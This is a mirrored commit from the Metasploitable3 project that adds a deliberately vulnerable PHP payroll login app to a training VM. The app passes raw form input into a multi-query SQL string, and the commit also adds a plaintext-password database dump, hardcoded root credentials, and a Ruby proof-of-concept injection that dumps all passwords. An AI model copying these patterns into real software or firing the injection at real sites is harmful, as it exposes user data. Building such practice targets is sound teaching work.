mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-07-02 01:35:50 +02:00
Land #127, PHP injection in Linux VM
This commit is contained in:
commit
e221d6ec49
1
Vagrantfile
vendored
1
Vagrantfile
vendored
|
@ -169,6 +169,7 @@ Vagrant.configure("2") do |config|
|
|||
chef.add_recipe "metasploitable::docker"
|
||||
chef.add_recipe "metasploitable::samba"
|
||||
chef.add_recipe "metasploitable::unrealircd"
|
||||
chef.add_recipe "metasploitable::payroll_app"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
60
chef/cookbooks/metasploitable/files/payroll_app/payroll.sql
Normal file
60
chef/cookbooks/metasploitable/files/payroll_app/payroll.sql
Normal file
|
@ -0,0 +1,60 @@
|
|||
-- phpMyAdmin SQL Dump
|
||||
-- version 3.5.8
|
||||
-- http://www.phpmyadmin.net
|
||||
--
|
||||
-- Host: 127.0.0.1
|
||||
-- Generation Time: Apr 10, 2017 at 04:42 PM
|
||||
-- Server version: 5.5.54-0ubuntu0.14.04.1
|
||||
-- PHP Version: 5.4.5
|
||||
|
||||
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
|
||||
SET time_zone = "+00:00";
|
||||
|
||||
|
||||
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
|
||||
/*!40101 SET NAMES utf8 */;
|
||||
|
||||
--
|
||||
-- Database: `payroll`
|
||||
--
|
||||
|
||||
-- --------------------------------------------------------
|
||||
|
||||
--
|
||||
-- Table structure for table `users`
|
||||
--
|
||||
|
||||
CREATE TABLE IF NOT EXISTS `users` (
|
||||
`username` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`first_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`last_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`password` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`salary` int(20) NOT NULL
|
||||
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
|
||||
|
||||
--
|
||||
-- Dumping data for table `users`
|
||||
--
|
||||
|
||||
INSERT INTO `users` (`username`, `first_name`, `last_name`, `password`, `salary`) VALUES
|
||||
('luke_skywalker', 'Luke', 'Skywalker', 'password', 102000),
|
||||
('leia_organa', 'Leia', 'Organa', 'obiwan', 95600),
|
||||
('han_solo', 'Han', 'Solo', 'sh00t-first', 12000),
|
||||
('artoo_detoo', 'Artoo', 'Detoo', 'beep_b00p', 22000),
|
||||
('c_three_pio', 'C', 'Threepio', 'pr0t0c0l', 32000),
|
||||
('ben_kenobi', 'Ben', 'Kenobi', 'thats_no_moon', 1000000),
|
||||
('darth_vader', 'Darth', 'Vader', 'd@rk_sid3', 666000),
|
||||
('anakin_skywalker', 'Anakin', 'Skywalker', 'yipp33!!', 0),
|
||||
('jarjar_binks', 'Jar-Jar', 'Binks', 'mesah_p@ssw0rd', 2000),
|
||||
('lando_calrissian', 'Lando', 'Calrissian', 'b@ckstab', 4000000),
|
||||
('boba_fett', 'Boba', 'Fett', 'mandalorian1', 2000000),
|
||||
('jabba_hutt', 'Jabba', 'The Hutt', 'not-a-slug12', 10000000),
|
||||
('greedo', 'Greedo', 'Rodian', 'hanShotFirst!', 500000),
|
||||
('chewbacca', 'Chewbacca', '', 'rwaaaaawr5', 4500),
|
||||
('kylo_ren', 'Kylo', 'Ren', 'daddy_issues1', 66600);
|
||||
|
||||
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
|
|
@ -0,0 +1,64 @@
|
|||
<?php
|
||||
|
||||
$conn = new mysqli('127.0.0.1', 'root', 'sploitme', 'payroll');
|
||||
if ($conn->connect_error) {
|
||||
die("Connection failed: " . $conn->connect_error);
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if (!isset($_POST['s'])) {
|
||||
?>
|
||||
<center>
|
||||
<form action="" method="post">
|
||||
<h2>Payroll Login</h2>
|
||||
<table style="border-radius: 25px; border: 2px solid black; padding: 20px;">
|
||||
<tr>
|
||||
<td>User</td>
|
||||
<td><input type="text" name="user"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="password" name="password"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="OK" name="s">
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</center>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if($_POST['s']){
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['password'];
|
||||
$sql = "select username, first_name, last_name, salary from users where username = '$user' and password = '$pass'";
|
||||
|
||||
if ($conn->multi_query($sql)) {
|
||||
do {
|
||||
/* store first result set */
|
||||
echo "<center>";
|
||||
echo "<h2>Welcome, " . $user . "</h2><br>";
|
||||
echo "<table style='border-radius: 25px; border: 2px solid black;' cellspacing=30>";
|
||||
echo "<tr><th>Username</th><th>First Name</th><th>Last Name</th><th>Salary</th></tr>";
|
||||
if ($result = $conn->store_result()) {
|
||||
while ($row = $result->fetch_assoc()) {
|
||||
$keys = array_keys($row);
|
||||
echo "<tr>";
|
||||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
if (!$conn->more_results()) {
|
||||
echo "</table></center>";
|
||||
}
|
||||
} while ($conn->next_result());
|
||||
}
|
||||
}
|
||||
?>
|
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb
Normal file
|
@ -0,0 +1,14 @@
|
|||
require 'net/http'
|
||||
|
||||
url = "http://127.0.0.1/payroll_app.php"
|
||||
uri = URI(url)
|
||||
user = 'luke_skywalker'
|
||||
injection = "password'; select password from users where username='' OR ''='"
|
||||
|
||||
puts "Making POST request to #{uri} with the following parameters:"
|
||||
puts "'user' = #{user}"
|
||||
puts "'password' = #{injection}"
|
||||
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
||||
|
||||
puts "Response body is #{res.body}"
|
||||
puts "Done"
|
32
chef/cookbooks/metasploitable/recipes/payroll_app.rb
Normal file
32
chef/cookbooks/metasploitable/recipes/payroll_app.rb
Normal file
|
@ -0,0 +1,32 @@
|
|||
#
|
||||
# Cookbook:: metasploitable
|
||||
# Recipe:: payroll_app
|
||||
# Copyright:: 2017, Rapid7, All Rights Reserved.
|
||||
|
||||
cookbook_file '/var/www/html/payroll_app.php' do
|
||||
source 'payroll_app/payroll_app.php'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
cookbook_file '/tmp/payroll.sql' do
|
||||
source 'payroll_app/payroll.sql'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
directory '/home/vagrant/poc/payroll_app/' do
|
||||
mode '0755'
|
||||
owner 'vagrant'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||
source 'payroll_app/poc.rb'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
bash 'create payroll database and import data' do
|
||||
code <<-EOH
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" payroll < /tmp/payroll.sql
|
||||
EOH
|
||||
end
|
|
@ -35,7 +35,7 @@ end
|
|||
bash "compile and install php" do
|
||||
code <<-EOH
|
||||
cd /home/vagrant/php-5.4.5
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysql
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysqli --enable-embedded-mysqli
|
||||
make
|
||||
make install
|
||||
EOH
|
||||
|
|
Loading…
Reference in New Issue
Block a user